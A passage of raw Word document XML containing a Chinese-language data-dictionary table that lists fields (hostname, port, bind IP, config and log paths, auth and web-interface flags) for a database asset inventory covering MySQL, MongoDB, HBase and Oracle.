          <w:p w14:paraId="5000F22E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25C83FFE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7001255E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77037B6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA34DEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F18000" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F22DA54" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4BAB66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07FB1D68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A3DED8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A8E9EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据库类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="442FFD24" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="471E8907" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="797BBA70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAC6648" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62DC9AEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据库版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E8E930A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000F2AC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E86F20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FFC1B3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15AD9089" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>监听端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7138BA7D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EABB41B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>protoType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C2968F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BACC0FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D74B461" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4833AAA5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285731AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34192219" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="433DDCAB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37475FD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>运行用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2A841CD1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01264DFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="358AB8C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25DF8A47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC89EE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绑定IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C78BD86" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29525A2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5759C7BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A506644" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="697018EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>配置文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77551E97" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F0B8278" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>logPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4798DF54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EBC7A06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA21039" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>日志文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="533E273B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1783766D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dataDir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2962F8E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F3B6CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24B873C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>数据路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="312ECEC2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1273D409" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pluginDir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009A0955" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3064ADDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="216EC2AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>插件目录,仅Linux MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="634553AF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BBEC63F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C85850" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F0A2D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AA411A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开放</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rest:'true';'false</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',仅Linux MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="771C3045" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75A846A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53AA5119" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F6185A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47112098" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启安全认证:'enabled'; 'disabled',仅Linux MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="169B4942" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F74CB18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA00D4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D2ACB37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DC2D612" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启web接口:'true'; 'false',仅Linux MongoDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46AF2135" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E561ED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28EA5BAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41CBC474" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="413C705B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web界面端口,仅Linux HBase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E84A888" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4799D967" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webAddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74361483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BDEC76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="662542E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web界面地址,仅Oracle以及Linux HBase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54D34283" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0242329E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regionServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="409C7645" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D72089D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC14DD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>region server列表,仅Linux HBase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BA2B050" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47AB7188" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dbName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="172F555C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DEA73EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
